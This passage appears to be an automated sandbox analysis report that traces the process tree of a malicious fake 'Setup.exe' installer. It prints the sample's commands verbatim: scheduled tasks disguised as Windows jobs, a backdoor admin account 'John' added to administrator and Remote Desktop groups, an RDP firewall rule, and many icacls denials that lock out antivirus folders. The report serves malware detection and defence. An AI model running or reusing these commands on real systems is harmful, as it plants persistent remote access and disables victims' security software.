schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1568 schtasks.exe 3140 schtasks.exe 3164 schtasks.exe 2992 schtasks.exe 2928 schtasks.exe 1748 schtasks.exe 3156 schtasks.exe 424 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2052 timeout.exe -
Modifies registry class 3 IoCs
Processes:
smss.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\MIME\Database smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe -
NTFS ADS 3 IoCs
Processes:
IP.exesmss.exedescription ioc process File opened for modification C:\ProgramData\Setup\winmgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\WinMgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup.exeupdate.exesmss.exepid process 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 1804 Setup.exe 3708 update.exe 3708 update.exe 3708 update.exe 3708 update.exe 3708 update.exe 3708 update.exe 3708 update.exe 3708 update.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe 2732 smss.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Setup.exeunsecapp.exepid process 1804 Setup.exe 1944 unsecapp.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
winserv.exewinserv.exewinserv.exeRDPWinst.exesvchost.exedescription pid process Token: SeDebugPrivilege 3812 winserv.exe Token: SeDebugPrivilege 1636 winserv.exe Token: SeTakeOwnershipPrivilege 2860 winserv.exe Token: SeTcbPrivilege 2860 winserv.exe Token: SeTcbPrivilege 2860 winserv.exe Token: SeDebugPrivilege 1372 RDPWinst.exe Token: SeAuditPrivilege 3932 svchost.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
Processes:
KMS.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exewinserv.exewinserv.exeRDPWinst.exepid process 1272 KMS.exe 3708 update.exe 3328 win.exe 3912 svchost.exe 2304 IP.exe 2732 smss.exe 3812 winserv.exe 3812 winserv.exe 3812 winserv.exe 3812 winserv.exe 3812 winserv.exe 2860 winserv.exe 2860 winserv.exe 2860 winserv.exe 2860 winserv.exe 1636 winserv.exe 1636 winserv.exe 1636 winserv.exe 1636 winserv.exe 1320 winserv.exe 1320 winserv.exe 1320 winserv.exe 1320 winserv.exe 1372 RDPWinst.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exeinstall.exeupdate.execmd.exesvchost.exesmss.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 1804 wrote to memory of 4504 1804 Setup.exe install.exe PID 1804 wrote to memory of 4504 1804 Setup.exe install.exe PID 1804 wrote to memory of 4504 1804 Setup.exe install.exe PID 4504 wrote to memory of 1272 4504 install.exe KMS.exe PID 4504 wrote to memory of 1272 4504 install.exe KMS.exe PID 4504 wrote to memory of 3708 4504 install.exe update.exe PID 4504 wrote to memory of 3708 4504 install.exe update.exe PID 3708 wrote to memory of 1568 3708 update.exe schtasks.exe PID 3708 wrote to memory of 1568 3708 update.exe schtasks.exe PID 3708 wrote to memory of 3140 3708 update.exe schtasks.exe PID 3708 wrote to memory of 3140 3708 update.exe schtasks.exe PID 3708 wrote to memory of 3164 3708 update.exe schtasks.exe PID 3708 wrote to memory of 3164 3708 update.exe schtasks.exe PID 3708 wrote to memory of 2992 3708 update.exe schtasks.exe PID 3708 wrote to memory of 2992 3708 update.exe schtasks.exe PID 3708 wrote to memory of 2928 3708 update.exe schtasks.exe PID 3708 wrote to memory of 2928 3708 update.exe schtasks.exe PID 3708 wrote to memory of 3328 3708 update.exe win.exe PID 3708 wrote to memory of 3328 3708 update.exe win.exe PID 3708 wrote to memory of 3328 3708 update.exe win.exe PID 3708 wrote to memory of 1748 3708 update.exe schtasks.exe PID 3708 wrote to memory of 1748 3708 update.exe schtasks.exe PID 3708 wrote to memory of 2052 3708 update.exe cmd.exe PID 3708 wrote to memory of 2052 3708 update.exe cmd.exe PID 3708 wrote to memory of 4080 3708 update.exe cmd.exe PID 3708 wrote to memory of 4080 3708 update.exe cmd.exe PID 4080 wrote to memory of 2476 4080 cmd.exe icacls.exe PID 4080 wrote to memory of 2476 4080 cmd.exe icacls.exe PID 3708 wrote to memory of 3912 3708 update.exe svchost.exe PID 3708 wrote to memory of 3912 3708 update.exe svchost.exe PID 3708 wrote to memory of 3912 3708 update.exe svchost.exe PID 3912 wrote to memory of 2304 3912 svchost.exe IP.exe PID 3912 wrote to memory of 2304 3912 svchost.exe IP.exe PID 3912 wrote to memory of 2732 3912 svchost.exe smss.exe PID 3912 wrote to memory of 2732 3912 svchost.exe smss.exe PID 2732 wrote to memory of 3156 2732 smss.exe schtasks.exe PID 2732 wrote to memory of 3156 2732 smss.exe schtasks.exe PID 2732 wrote to memory of 424 2732 smss.exe schtasks.exe PID 2732 wrote to memory of 424 2732 smss.exe schtasks.exe PID 2732 wrote to memory of 3812 2732 smss.exe winserv.exe PID 2732 wrote to memory of 3812 2732 smss.exe winserv.exe PID 2732 wrote to memory of 3812 2732 smss.exe winserv.exe PID 2732 wrote to memory of 4768 2732 smss.exe cmd.exe PID 2732 wrote to memory of 4768 2732 smss.exe cmd.exe PID 4768 wrote to memory of 1508 4768 cmd.exe net.exe PID 4768 wrote to memory of 1508 4768 cmd.exe net.exe PID 1508 wrote to memory of 1316 1508 net.exe net1.exe PID 1508 wrote to memory of 1316 1508 net.exe net1.exe PID 2732 wrote to memory of 1552 2732 smss.exe cmd.exe PID 2732 wrote to memory of 1552 2732 smss.exe cmd.exe PID 1552 wrote to memory of 2436 1552 cmd.exe net.exe PID 1552 wrote to memory of 2436 1552 cmd.exe net.exe PID 2436 wrote to memory of 560 2436 net.exe Conhost.exe PID 2436 wrote to memory of 560 2436 net.exe Conhost.exe PID 2732 wrote to memory of 3672 2732 smss.exe cmd.exe PID 2732 wrote to memory of 3672 2732 smss.exe cmd.exe PID 3672 wrote to memory of 1568 3672 cmd.exe net.exe PID 3672 wrote to memory of 1568 3672 cmd.exe net.exe PID 2732 wrote to memory of 4816 2732 smss.exe cmd.exe PID 2732 wrote to memory of 4816 2732 smss.exe cmd.exe PID 1568 wrote to memory of 4852 1568 net.exe net1.exe PID 1568 wrote to memory of 4852 1568 net.exe net1.exe PID 4816 wrote to memory of 4752 4816 cmd.exe cmd.exe PID 4816 wrote to memory of 4752 4816 cmd.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup-pass-2024\Setup.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\install.exeC:\ProgramData\Setup\install.exe -palexpassword2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\KMS.exe"C:\ProgramData\Setup\KMS.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CleanCash" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OfficeCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CheckGlobal" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Microsoft\win.exeC:\ProgramData\Microsoft\win.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\DataBaseA\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\GB2x8f82s0LV6\DataBaseA.bat" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\unsecapp.exeC:\Windows\SysWOW64\unsecapp.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat6⤵
- Drops file in Drivers directory
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST6⤵
- Creates scheduled task(s)
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet user John 12345 /add7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add6⤵
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add8⤵
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow7⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat6⤵
-
C:\Windows\system32\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)4⤵
-
